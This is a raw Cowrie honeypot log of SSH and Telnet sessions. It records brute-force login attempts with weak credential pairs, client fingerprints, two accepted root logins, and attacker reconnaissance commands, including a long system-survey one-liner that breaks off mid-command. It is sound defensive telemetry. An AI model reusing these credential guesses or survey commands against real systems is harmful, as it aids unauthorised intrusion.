{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13776,"dst_ip":"1.2.3.4","dst_port":22,"session":"f28831d8af4a","protocol":"ssh","message":"New connection: 212.227.235.229:13776 (1.2.3.4:22) [session: f28831d8af4a]","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.123262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.124121Z","src_ip":"212.227.235.229","session":"f28831d8af4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.289009Z","src_ip":"212.227.235.229","session":"2c9910a0e2a6"}
{"eventid":"cowrie.session.closed","duration":3.3475446701049805,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.293208Z","src_ip":"212.227.235.229","session":"2c9910a0e2a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.379807Z","src_ip":"212.227.235.229","session":"f28831d8af4a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Aa112233","message":"login attempt [ubuntu/Aa112233] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:01.441704Z","src_ip":"212.227.235.229","session":"f28831d8af4a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:02.703970Z","src_ip":"212.227.235.229","session":"f28831d8af4a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38132,"dst_ip":"1.2.3.4","dst_port":22,"session":"2458a1da2bc6","protocol":"ssh","message":"New connection: 41.226.27.251:38132 (1.2.3.4:22) [session: 2458a1da2bc6]","sensor":"my-vps","timestamp":"2025-08-31T03:34:03.899019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:03.911855Z","src_ip":"41.226.27.251","session":"2458a1da2bc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:34:03.951911Z","src_ip":"41.226.27.251","session":"2458a1da2bc6"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:04.162196Z","src_ip":"41.226.27.251","session":"2458a1da2bc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60718,"dst_ip":"1.2.3.4","dst_port":22,"session":"d67b65cf7cf8","protocol":"ssh","message":"New connection: 212.227.125.160:60718 (1.2.3.4:22) [session: d67b65cf7cf8]","sensor":"my-vps","timestamp":"2025-08-31T03:34:04.590932Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:05.604584Z","src_ip":"41.226.27.251","session":"2458a1da2bc6"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:05.967999Z","src_ip":"212.227.235.229","session":"c0af2260a036"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43800,"dst_ip":"1.2.3.4","dst_port":23,"session":"90f83a87c0f7","protocol":"telnet","message":"New connection: 212.227.235.229:43800 (1.2.3.4:23) [session: 90f83a87c0f7]","sensor":"my-vps","timestamp":"2025-08-31T03:34:06.203782Z"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:07.802029Z","src_ip":"212.227.235.229","session":"c0af2260a036"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:12.067041Z","src_ip":"212.227.125.160","session":"d67b65cf7cf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:34:12.067868Z","src_ip":"212.227.125.160","session":"d67b65cf7cf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33766,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d82eb4504f","protocol":"ssh","message":"New connection: 212.227.125.160:33766 (1.2.3.4:22) [session: f2d82eb4504f]","sensor":"my-vps","timestamp":"2025-08-31T03:34:14.076813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:34:14.077998Z","src_ip":"212.227.125.160","session":"f2d82eb4504f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:34:14.325444Z","src_ip":"212.227.125.160","session":"f2d82eb4504f"}
{"eventid":"cowrie.login.failed","username":"user","password":"Aa12345678","message":"login attempt [user/Aa12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:15.354515Z","src_ip":"212.227.125.160","session":"f2d82eb4504f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:16.598259Z","src_ip":"212.227.125.160","session":"f2d82eb4504f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53258,"dst_ip":"1.2.3.4","dst_port":22,"session":"d43b58dd2d08","protocol":"ssh","message":"New connection: 212.227.125.160:53258 (1.2.3.4:22) [session: d43b58dd2d08]","sensor":"my-vps","timestamp":"2025-08-31T03:34:20.595576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:21.056559Z","src_ip":"212.227.125.160","session":"d43b58dd2d08"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:34:21.057273Z","src_ip":"212.227.125.160","session":"d43b58dd2d08"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:23.028623Z","src_ip":"212.227.125.160","session":"d43b58dd2d08"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36554,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a7b89a79bb","protocol":"ssh","message":"New connection: 41.226.27.251:36554 (1.2.3.4:22) [session: b2a7b89a79bb]","sensor":"my-vps","timestamp":"2025-08-31T03:34:24.076284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:24.104867Z","src_ip":"41.226.27.251","session":"b2a7b89a79bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:34:24.120097Z","src_ip":"41.226.27.251","session":"b2a7b89a79bb"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-31T03:34:24.294439Z","src_ip":"41.226.27.251","session":"b2a7b89a79bb"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:24.557962Z","src_ip":"212.227.125.160","session":"d43b58dd2d08"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:25.535487Z","src_ip":"41.226.27.251","session":"b2a7b89a79bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53804,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df33f2b9971","protocol":"ssh","message":"New connection: 212.227.235.229:53804 (1.2.3.4:22) [session: 5df33f2b9971]","sensor":"my-vps","timestamp":"2025-08-31T03:34:29.629341Z"}
{"eventid":"cowrie.session.closed","duration":31.115113735198975,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:37.318818Z","src_ip":"212.227.235.229","session":"90f83a87c0f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39826,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bcd88a7862b","protocol":"ssh","message":"New connection: 212.227.235.229:39826 (1.2.3.4:22) [session: 3bcd88a7862b]","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.200157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.439575Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.453358Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56794,"dst_ip":"1.2.3.4","dst_port":22,"session":"006299f63d77","protocol":"ssh","message":"New connection: 41.226.27.251:56794 (1.2.3.4:22) [session: 006299f63d77]","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.935278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.940812Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:34:43.979304Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.152399Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.209360Z","src_ip":"212.227.235.229","session":"5df33f2b9971"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.211121Z","src_ip":"212.227.235.229","session":"5df33f2b9971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:34:44.257258Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.258007Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.304013Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:34:44.305230Z","src_ip":"41.226.27.251","session":"006299f63d77"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:34:46.197599Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:34:46.631615Z","src_ip":"212.227.235.229","session":"3bcd88a7862b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model 